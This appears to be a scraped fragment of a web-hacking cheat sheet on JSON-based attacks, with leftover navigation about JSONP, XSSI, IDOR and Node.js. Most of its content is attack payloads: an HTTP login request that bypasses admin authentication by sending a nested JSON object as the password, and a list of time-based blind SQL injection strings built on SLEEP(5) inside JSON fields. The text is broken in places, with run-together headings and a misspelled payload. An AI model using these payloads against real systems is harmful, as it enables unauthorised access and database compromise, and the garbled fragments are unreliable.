JSON Attack
JSON Injection
REST API




IDOR
Node.js
Interesting Books
Bypass Admin Login
POST /api/login HTTP/1.1
Host: vuln-web.io
[...]
{"username":"admin","password":{"password": 1}}Blind SQL Injection
[-1+or+1%3d((SELET+1+FROM+(SELECT+SLEEP(5))A))]
{AnD SLEEP(5)}
{1 AnD SLEEP(5)}
{1' AnD SLEEP(5)--}
{sleep 5}
"emails":["AnD SLEEP(5)"]
"emails":["test@test.com OR SLEEP(5)#"]
{"options":{"id":[],"emails":["AnD SLEEP(5)"],Add Parameter


JSON Injection
JSON Padding, JSONP
Detection
Exploit


XSSI an JSONP
JSON Globbing
IDORNode.js
Node.jsInteresting Books
Interesting BooksLast updated
